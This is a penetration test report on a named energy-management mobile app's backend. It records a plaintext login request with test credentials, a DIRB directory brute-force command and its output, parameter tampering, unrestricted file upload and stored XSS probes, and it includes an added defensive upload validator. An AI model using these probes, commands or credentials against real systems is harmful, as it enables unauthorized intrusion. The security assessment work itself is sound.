- User password transmitted in plaintext:
No plaintext transmission
POST /api/user/login?platform=ios&version=1.2.25&username=null HTTP/1.1
Host: mobile.mm.energymost.com
Content-Type: application/json
Connection: keep-alive
disco-deviceid: E20C620040AC84833D59A5DC16C6B3D1
language: zh-CN
Accept: application/json
Accept-Language: zh-cn
Content-Length: 46
Accept-Encoding: gzip, deflate
User-Agent: %E6%9C%BA%E5%99%A8%E9%A1%BE%E9%97%AE/1 CFNetwork/887 Darwin/17.0.0
{"UserName":"cncert ","Password":"cncert0406"}
- No unified error page defined:
404, 403, 500, etc.
- Web server console exposure:
No console login page found
DIRB directory brute-force tool installation: http://prithak.blogspot.com/2011/08/brute-force-directory-and-files-on-web.html
Run: dirb https://mobile.mm.energymost.com wordlists/common.txt -p proxy.asec.buptnsrc.com:8001
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 31 20:32:07 2017
URL_BASE: https://mobile.mm.energymost.com/
WORDLIST_FILES: wordlists/common.txt
PROXY: proxy.asec.buptnsrc.com:8001
-----------------
GENERATED WORDS: 4612
---- Scanning URL: https://mobile.mm.energymost.com/ ----
+ https://mobile.mm.energymost.com/config (CODE:301|SIZE:185)
+ https://mobile.mm.energymost.com/log (CODE:301|SIZE:182)
+ https://mobile.mm.energymost.com/Log (CODE:301|SIZE:182)
-----------------
END_TIME: Tue Oct 31 21:45:17 2017
DOWNLOADED: 4612 - FOUND: 3
- Unauthorized access risk:
No unauthorized-access risk found
After changing "TicketTaskType:1->2" in one user's request and resending it, the response content for "TicketTaskType:2" is returned;
After changing the username in a request and resending it, the response content is unchanged;
- Arbitrary file upload:
With content-type=image/jpeg:
Arbitrarily change the file name and re-upload: response 200
Arbitrarily change the file extension and re-upload: response 200
Arbitrarily change the file contents and re-upload: response 200
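As an added, defender-side example (not code from this report or from the application under test), a server-side upload check that rejects each of the three manipulations listed above instead of trusting the Content-Type header; the allowed types, size limit and filename rule are assumptions for this example.

```python
import re

# Upload policy for an image-only endpoint (constructed for this example;
# the application's real policy is not known).
ALLOWED = {
    "image/jpeg": {"extensions": {".jpg", ".jpeg"}, "magic": [b"\xff\xd8\xff"]},
    "image/png": {"extensions": {".png"}, "magic": [b"\x89PNG\r\n\x1a\n"]},
}
MAX_BYTES = 5 * 1024 * 1024
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename: str, content_type: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Every check must pass: the declared
    Content-Type, the extension and the file's own magic bytes must agree."""
    if len(data) == 0 or len(data) > MAX_BYTES:
        return False, "bad size"
    policy = ALLOWED.get(content_type.split(";")[0].strip().lower())
    if policy is None:
        return False, "content-type not allowed"
    # Strip any directory part, then refuse double extensions (e.g. x.jpg.php).
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if base.count(".") != 1:
        return False, "bad filename"
    stem, ext = base.rsplit(".", 1)
    ext = "." + ext.lower()
    if not SAFE_STEM.match(stem):
        return False, "bad filename"
    if ext not in policy["extensions"]:
        return False, "extension does not match content-type"
    # Renamed or rewritten content still has to look like the declared type.
    if not any(data.startswith(m) for m in policy["magic"]):
        return False, "file content does not match content-type"
    return True, "ok"
```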
- Stored XSS in multiple places in the system:
The app has a feedback box that accepts text and images and may be vulnerable;
Test: enter "测试" in the feedback box and submit; inspecting the request in Charles shows {"ContactInfo":"","Content":"测试","PictureURLs":[]}
not encrypted;
Change the content to "<script>alert('xss');</script>" and submit; the request shows: {"ContactInfo":"","Content":"<script>alert('xss');</script>","PictureURLs":[]};
<script> is not filtered
Change the content to "<img src='' onerror=alert('xss')>" and submit; the request shows: {"ContactInfo":"","Content":"<img src='' onerror=alert('xss')>","PictureURLs":[]};
onerror is not filtered
- Login XSS:
<script>alert('1')</script> is filtered